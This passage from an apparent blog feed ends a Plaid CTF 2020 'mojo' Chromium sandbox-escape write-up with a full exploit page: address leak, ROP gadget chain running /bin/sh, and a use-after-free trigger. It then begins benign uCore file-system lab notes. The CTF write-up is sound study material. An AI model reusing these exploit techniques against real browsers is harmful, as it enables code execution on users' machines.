class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">function</span> <span class="title function_">success</span>(<span class="params">msg</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[+] &#x27;</span> + msg);</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">/*</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                注意这里最好不要直接修改document.body.innerText</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                因为修改document.body.innerText将会删除当前body上的所有节点，</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                包括appendChild上去的child iframe</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">            */</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> elem = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&quot;#parentLog&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span>(elem == <span class="literal">undefined</span>)</span></span><br><span class="line"><span class="language-javascript">            &#123;</span></span><br><span class="line"><span class="language-javascript">                elem = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;div&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(elem);</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">            elem.<span class="property">innerText</span> += <span class="string">&#x27;[+] &#x27;</span> + msg + <span class="string">&#x27;\n&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">function</span> <span class="title function_">dec2hex</span>(<span class="params">dec</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + dec.<span class="title function_">toString</span>(<span class="number">16</span>);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">pwn</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="title function_">success</span>(<span class="string">&quot;try append child iframe&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> frame = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;iframe&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            frame.<span class="property">srcdoc</span> = <span class="string">`</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script src=&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;&gt;&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script src=&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;&gt;&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    function dec2hex(dec) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        return &quot;0x&quot; + dec.toString(16);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    function bytes2DWORD(bytes) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var value = 0;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        for (let i = 0; i &lt; 8; i++) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            value = value * 0x100 + bytes[7 - i];</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        return value;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    function success(msg) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        console.log(&#x27;[+] &#x27; + msg);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var elem = document.getElementById(&quot;#childLog&quot;);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        if(elem == undefined)</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            elem = document.createElement(&quot;div&quot;);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            document.body.appendChild(elem);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        document.body.innerText += &#x27;[+] &#x27; + msg + &#x27;\\n&#x27;;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    async function pwn() &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var try_size = 100;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var plaidStorePtrList = [];</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        for (let i = 0; i &lt; try_size; i++) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            var plaidStorePtr = new blink.mojom.PlaidStorePtr();</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            // 将plaidStore实例与mojo pipe绑定</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            Mojo.bindInterface(</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                blink.mojom.PlaidStore.name,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                mojo.makeRequest(plaidStorePtr).handle,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                &quot;context&quot;,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                true);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            await plaidStorePtr.storeData(&quot;aaaa&quot;, new Uint8Array(0x28).fill(0x30 + i));</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            plaidStorePtrList.push(plaidStorePtr);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var PlaidStore_vtable_addr = 0;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var render_frame_host_addr = 0;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        for (let i = 0; i &lt; try_size; i++) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            // 注意这里使用await，保证异步操作。因为promise回调是同步的。</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            // 获取返回的promiseValue</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            let res = await plaidStorePtrList[i].getData(&quot;aaaa&quot;, 0x100);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            let data = res.data;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            for (let j = 0x28; j &lt; 0x100 - 0x8; j += 0x8) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                // 尽管返回的是string，但仍然可以直接当作十六进制数字来使用。</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                var hex = bytes2DWORD(data.slice(j, j + 0x8));</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                if ((hex &amp; 0xfff) == 0x7a0) &#123;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                    PlaidStore_vtable_addr = dec2hex(hex);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                    render_frame_host_addr = dec2hex(bytes2DWORD(data.slice(j + 0x8, j + 0x10)));</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                    success(&quot;PlaidStore vtable: &quot; + PlaidStore_vtable_addr);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                    success(&quot;render_frame_host: &quot; + render_frame_host_addr);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                    break;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            if (PlaidStore_vtable_addr != 0)</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">                break;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        if (PlaidStore_vtable_addr == 0)</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">            throw &quot;PlaidStore vtable addr leak failed!&quot;;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript"></span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        var chromeTextBase = PlaidStore_vtable_addr - 0x9fb67a0;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        success(&quot;chrome Text Base: &quot; + dec2hex(chromeTextBase));</span></span></span><br><span class="line"><span class="string"><span class="language-javascript"></span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        window.plaidStorePtr = plaidStorePtrList[0];</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        window.chromeTextBase = chromeTextBase;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        window.render_frame_host_addr = render_frame_host_addr;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        success(&quot;iframe loaded&quot;);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    &#125;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">`</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(frame);</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// 在frame加载完成后再异步执行其中的代码</span></span></span><br><span class="line"><span class="language-javascript">            frame.<span class="property">contentWindow</span>.<span class="title function_">addEventListener</span>(<span class="string">&quot;DOMContentLoaded&quot;</span>, <span class="title function_">async</span> () =&gt; &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;parent iframe start working&quot;</span>)</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 等待frame中的js代码执行完成</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">await</span> frame.<span class="property">contentWindow</span>.<span class="title function_">pwn</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> childPlaidStorePtr = frame.<span class="property">contentWindow</span>.<span class="property">plaidStorePtr</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> childRenderFrameHost = <span class="built_in">parseInt</span>(frame.<span class="property">contentWindow</span>.<span class="property">render_frame_host_addr</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> chromeTextBase = <span class="built_in">parseInt</span>(frame.<span class="property">contentWindow</span>.<span class="property">chromeTextBase</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 这里只要判断一个变量就知道iframe是否成功加载</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">if</span> (childPlaidStorePtr == <span class="literal">undefined</span> || childPlaidStorePtr == <span class="number">0</span>)</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">throw</span> <span class="string">&quot;Error in iframe loading&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 获取各种gadget地址</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> xchg_addr = chromeTextBase + <span class="number">0x000000000880dee8</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;xchg_addr: &quot;</span> + <span class="title function_">dec2hex</span>(xchg_addr));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> pop_rdi_ret = chromeTextBase + <span class="number">0x0000000002e4630f</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;pop_rdi_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rdi_ret));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> pop_rsi_ret = chromeTextBase + <span class="number">0x0000000002d278d2</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;pop_rsi_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rsi_ret));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> pop_rdx_ret = chromeTextBase + <span class="number">0x0000000002e9998e</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;pop_rdx_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rdx_ret));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> pop_rax_ret = chromeTextBase + <span class="number">0x0000000002e651dd</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;pop_rax_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rax_ret));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> syscall_addr = chromeTextBase + <span class="number">0x0000000002ef528d</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;syscall_addr: &quot;</span> + <span class="title function_">dec2hex</span>(syscall_addr));</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 预先分配0xc28</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> buf = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0xc28</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 将原先buffer转为int64位的数组（内存地址不变</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> uaf_buf = <span class="keyword">new</span> <span class="title class_">BigUint64Array</span>(buf);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">/* 开始布置gadgets</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                   先将对应vtable entry的前8个字节设置为childRenderFrameHost+0x10</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                   这样当crash时，$rax一定等于该值。 */</span></span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">0</span>] = <span class="title class_">BigInt</span>(childRenderFrameHost + <span class="number">0x10</span>);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">3</span>] = <span class="title class_">BigInt</span>(pop_rdi_ret);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">4</span>] = <span class="title class_">BigInt</span>(childRenderFrameHost + <span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">0x8</span>);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">5</span>] = <span class="title class_">BigInt</span>(pop_rsi_ret);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">6</span>] = <span class="title class_">BigInt</span>(<span class="number">0</span>);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">7</span>] = <span class="title class_">BigInt</span>(pop_rdx_ret);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">8</span>] = <span class="title class_">BigInt</span>(<span class="number">0</span>);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">9</span>] = <span class="title class_">BigInt</span>(pop_rax_ret);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">10</span>] = <span class="title class_">BigInt</span>(<span class="number">59</span>);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">11</span>] = <span class="title class_">BigInt</span>(syscall_addr);</span></span><br><span class="line"><span class="language-javascript">                uaf_buf[(<span class="number">0x160</span> + <span class="number">0x10</span>) / <span class="number">0x8</span>] = <span class="title class_">BigInt</span>(xchg_addr);</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> uaf_uint8 = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(buf); <span class="comment">// /bin/sh\x00</span></span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">0</span>] = <span class="number">0x2f</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">1</span>] = <span class="number">0x62</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">2</span>] = <span class="number">0x69</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">3</span>] = <span class="number">0x6e</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">4</span>] = <span class="number">0x2f</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">5</span>] = <span class="number">0x73</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">6</span>] = <span class="number">0x68</span>;</span></span><br><span class="line"><span class="language-javascript">                uaf_uint8[<span class="number">0x10</span> + <span class="number">0x160</span> + <span class="number">8</span> + <span class="number">7</span>] = <span class="number">0x00</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 在parent iframe中建立PlaidStoreImpl实例</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> parentPlaidStorePtr = <span class="keyword">new</span> blink.<span class="property">mojom</span>.<span class="title class_">PlaidStorePtr</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="title class_">Mojo</span>.<span class="title function_">bindInterface</span>(</span></span><br><span class="line"><span class="language-javascript">                    blink.<span class="property">mojom</span>.<span class="property">PlaidStore</span>.<span class="property">name</span>,</span></span><br><span class="line"><span class="language-javascript">                    mojo.<span class="title function_">makeRequest</span>(parentPlaidStorePtr).<span class="property">handle</span>,</span></span><br><span class="line"><span class="language-javascript">                    <span class="string">&quot;context&quot;</span>,</span></span><br><span class="line"><span class="language-javascript">                    <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 释放child iframe</span></span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">removeChild</span>(frame);</span></span><br><span class="line"><span class="language-javascript">                frame.<span class="title function_">remove</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 大量分配内存，用于占位。</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">100</span>; i++)</span></span><br><span class="line"><span class="language-javascript">                    <span class="comment">// 需要注意这里的storeData的索引要变化，不然每次填充数据都只会在一块内存区域上反复填充。</span></span></span><br><span class="line"><span class="language-javascript">                    parentPlaidStorePtr.<span class="title function_">storeData</span>(<span class="string">&quot;1&quot;</span> + i, <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(buf));</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 尝试利用UAF漏洞来触发</span></span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">success</span>(<span class="string">&quot;get shell!&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">                childPlaidStorePtr.<span class="title function_">getData</span>(<span class="string">&quot;aaaa&quot;</span>, <span class="number">0x28</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125;);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">pwn()</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><p>执行并利用成功</p><p><img src="/2020/10/mojo/success.png" alt="img"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;1-简介&quot;&gt;1. 简介&lt;/h2&gt;
&lt;p&gt;Plaid CTF 2020 &lt;code&gt;mojo&lt;/code&gt; 是 chromium sandbox escape 沙箱逃逸的一道基础题，适合用于&lt;code&gt;chrome&lt;/code&gt;入门。&lt;/p&gt;
&lt;p&gt;题目来源 - &lt;a href=&quot;https://ctftime.org/task/11314&quot;&gt;ctftime - task11314&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/chrome/"/>
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="chrome" scheme="https://kiprey.github.io/tags/chrome/"/>
    
    <category term="sandbox escape" scheme="https://kiprey.github.io/tags/sandbox-escape/"/>
    
  </entry>
  
  <entry>
    <title>uCore实验 - Lab8</title>
    <link href="https://kiprey.github.io/2020/09/uCore-8/"/>
    <id>https://kiprey.github.io/2020/09/uCore-8/</id>
    <published>2020-09-27T09:35:38.000Z</published>
    <updated>2025-11-24T03:59:40.156Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里是笔者在完成<code>uCore</code> Lab 8时写下的一些笔记</li><li>内容涉及文件系统与I/O子系统的一些相关实现。</li><li>内容巨多，建议使用右侧导航栏</li></ul><span id="more"></span><h2 id="知识点">知识点</h2><h3 id="1-文件系统和文件">1. 文件系统和文件</h3><ul><li><p><strong>文件系统是操作系统中管理持久性数据的子系统，提供数据存储和访问功能</strong></p><ul><li>组织、检索、读写访问数据</li><li>大多数计算机系统都有文件系统</li><li>Google也是一个文件系统</li></ul></li><li><p><strong>文件是具有符号名，由字节序列构成的数据项集合</strong></p><ul><li>文件系统的基本数据单位</li><li>文件名是文件的标识符号</li></ul></li><li><p>文件系统的功能</p><ul><li><strong>分配文件磁盘空间</strong><ul><li>管理文件块（位置和顺序）</li><li>管理空闲空间（位置）</li><li>分配算法（策略）</li></ul></li><li><strong>管理文件集合</strong><ul><li>定位：文件及其内容</li><li>命名：通过名字找到文件</li><li>文件系统结构：文件组织方式</li></ul></li><li><strong>数据可靠和安全</strong><ul><li>安全：多层次保护数据</li><li>可靠<ul><li>持久保存文件</li><li>避免系统崩溃、媒体错误、攻击等</li></ul></li></ul></li></ul></li><li><p>文件属性</p><ul><li><p>名称、类型、大小、位置、保护、创建者、创建时间、最近修改时间</p></li><li><p>文件头：文件系统元数据中的文件信息</p><ul><li>文件属性</li><li>文件存储位置和顺序</li></ul></li></ul></li></ul><h3 id="2-文件描述符">2. 文件描述符</h3><ul><li><p>打开文件和文件描述符</p><ul><li><p><strong>文件访问模式</strong>：进程访问文件数据前必须先“打开”文件</p></li><li><p><strong>内核跟踪</strong>进程打开的所有文件</p><ul><li>操作系统为每个进程维护一个打开文件表</li><li>文件描述符是打开文件的标识</li></ul></li></ul></li><li><p>操作系统在打开文件表中维护的打开文件状态和信息</p><ul><li><strong>文件指针</strong><ul><li>记录最近一次读写位置</li><li>每个进程分别维护自己已打开的文件指针</li></ul></li><li><strong>文件打开次数</strong><ul><li>当前打开文件的次数</li><li>最后一个进程关闭文件时，将其从打开文件表中移除</li></ul></li><li><strong>文件的磁盘信息</strong>：缓存数据访问信息</li><li><strong>访问权限</strong>：每个进程的文件访问模式信息</li></ul></li><li><p>文件的<strong>用户视图</strong>和<strong>系统视图</strong></p><ul><li><p>文件的<strong>用户视图</strong>：持久的<strong>数据结构</strong></p></li><li><p>系统访问接口</p><ul><li>字节序列的集合（Unix)</li><li>系统不关心存储在磁盘上的数据结构</li></ul></li><li><p>操作系统的<strong>文件视图</strong></p><ul><li>数据块的集合</li><li>数据块是逻辑运算单位，而扇区是物理存储单位</li><li>块大小通常来说<strong>不等于</strong>扇区大小</li></ul></li><li><p>用户视图到系统视图的转换</p><ul><li>进程读文件：获取字节所在的数据块，返回数据块对应部分</li><li>进程写文件：获取数据块，修改数据块中对应部分，写回数据块</li></ul><blockquote><p><strong>文件系统中的基本操作单位是数据块</strong>。</p></blockquote></li></ul></li><li><p><strong>访问模式</strong></p><ul><li>操作系统需要了解进程如何访问文件</li><li><strong>顺序</strong>访问：按字节依次读取。大多数的文件访问都是顺序读取。</li><li><strong>随机</strong>访问：从中间读写。不常用但仍然重要，例如虚拟内存中把内存页存储在文件上</li><li><strong>索引</strong>访问：依据数据库特征索引。<ul><li>通常操作系统不完整提供索引访问</li><li>数据库是建立在索引内容的磁盘访问上</li></ul></li></ul></li><li><p><strong>文件内部结构</strong></p><ul><li>无结构：单词、字节序列</li><li>简单记录结构：分列、固定长度、可变长度</li><li>复杂结构：格式化的文档、可执行文件、…</li></ul></li><li><p><strong>文件共享和访问控制</strong></p><ul><li><strong>多用户</strong>系统中的文件共享相当重要</li><li>访问控制<ul><li>每个用户能够获得哪些文件的哪些访问权限</li><li>访问模式：读、写、执行、删除、列表等</li></ul></li><li>文件访问控制列表（ACL）： &lt;文件实体，权限&gt;</li><li>Unix模式<ul><li>&lt;用户|组|所有人，读|写|可执行&gt;</li><li>用户标识ID：识别用户，表明每个用户所允许的权限及保护模式</li><li>组标识ID：允许用户组成组，并指定组访问权限</li></ul></li></ul></li><li><p><strong>语义一致性</strong></p><ul><li><strong>规定多进程如何同时访问共享文件</strong><ul><li>与同步算法类似</li><li>因磁盘I/O和网络延迟而设计简单</li></ul></li><li>Unix文件系统（UFS）语义<ul><li>对所打开文件的写入内容立即对其他打开同一文件的其他用户可见</li><li>共享文件指针允许多用户同时读取和写入文件</li></ul></li><li>会话语义：写入内容只有当文件关闭时可见</li><li>读写锁：一些操作系统和文件系统提供该功能</li></ul></li></ul><h3 id="3-目录、文件别名和文件系统种类">3. 目录、文件别名和文件系统种类</h3><ul><li><p><strong>分层文件系统</strong></p><ul><li><p>文件以目录的方式组织起来</p></li><li><p><strong>目录是一类特殊的文件</strong>：目录的内容是文件索引表 <strong>&lt;文件|指向文件的指针&gt;</strong></p></li><li><p>目录和文件的<strong>树形结构</strong>（早期的文件系统是扁平的）</p><p><img src="/2020/09/uCore-8/directoryTree.png" alt="img"></p></li></ul></li><li><p><strong>目录操作</strong></p><ul><li>典型目录操作<ul><li>搜索、创建、删除文件</li><li>列目录、重命名、遍历路径</li></ul></li><li>操作系统应该只允许内核修改目录<ul><li>确保映射的完整性</li><li>应用程序通过系统调用访问目录</li></ul></li></ul></li><li><p><strong>目录实现</strong></p><ul><li>文件名的线性列表，包含了指向数据块的指针。<ul><li>编程简单</li><li>执行耗时。</li></ul></li><li>哈希表——哈希数据结构的线性表<ul><li>减少目录搜索时间</li><li>碰撞——两个文件名的哈希值相同</li><li>固定大小</li></ul></li></ul></li><li><p><strong>文件别名</strong></p><blockquote><p>两个或多个文件名关联同一个文件</p></blockquote><ul><li><p>硬链接：多个文件项指向一个文件</p></li><li><p>软链接：以“快捷方式”指向其他文件</p><blockquote><p>通过存储其真实文件的逻辑名称来实现。</p></blockquote></li></ul><p><img src="/2020/09/uCore-8/file_rename.png" alt="img"></p></li><li><p><strong>文件目录中的循环</strong></p><ul><li>如何保证没有循环<ul><li>只允许到文件的链接，不允许在子目录的链接</li><li>增加链接时，用循环检测算法确定是否合理</li></ul></li><li>更多实践：<strong>限制路径可遍历文件目录的数量</strong></li></ul><p><img src="/2020/09/uCore-8/directoryLoop.png" alt="img"></p></li><li><p><strong>名字解析（路径遍历）</strong></p><ul><li>名字解析：把逻辑名字转换成物理资源（如文件）<ul><li>依据路径名，在文件系统中找到实际文件位置</li><li>遍历文件目录直到找到目标文件</li></ul></li><li>举例：解析<code>/bin/sh</code><ul><li>读取根目录的文件头（在磁盘固定位置）</li><li>读取根目录的数据快，搜索<code>bin</code>项</li><li>读取<code>bin</code>的文件头</li><li>读取<code>bin</code>的数据块，搜索<code>ls</code>项</li><li>读取<code>ls</code>的文件头</li></ul></li><li>当前工作目录（PWD）<ul><li>每个进程都会指向一个文件目录用于解析文件名</li><li>允许用户指定相对路径来代替绝对路径</li></ul></li></ul></li><li><p>文件系统挂载</p><ul><li>文件系统需要先挂载才能被访问</li><li>未挂载的文件系统被挂载在挂载点上</li></ul></li><li><p><strong>文件系统种类</strong></p><ul><li>磁盘文件系统：文件存储在数据存储设备上，如磁盘。例如：FAT, NTFS， ext2/3, ISO9660等等</li><li>数据库文件系统：文件特征是可被寻址的，例如WinFS</li><li>日志文件系统：记录文件系统的修改事件</li><li>特殊/虚拟文件系统</li><li>网络/分布式文件系统<ul><li>文件可以通过网络被共享<ul><li>文件位于远程服务器</li><li>客户端远程挂载服务器文件系统</li><li>标准系统文件访问被转换为成远程访问</li><li>标准文件共享协议：NFS for Unix, CIFS for Windows。</li></ul></li><li>分布式文件系统的挑战<ul><li>客户端和客户端上的用户辨别起来很复杂</li><li><strong>一致性</strong>问题</li><li><strong>错误处理模式</strong></li></ul></li></ul></li></ul></li></ul><h3 id="4-虚拟文件系统">4. 虚拟文件系统</h3><ul><li><p>文件系统的实现：<strong>分层结构</strong></p><ul><li>虚拟（逻辑）文件系统（VFS， Virtual File 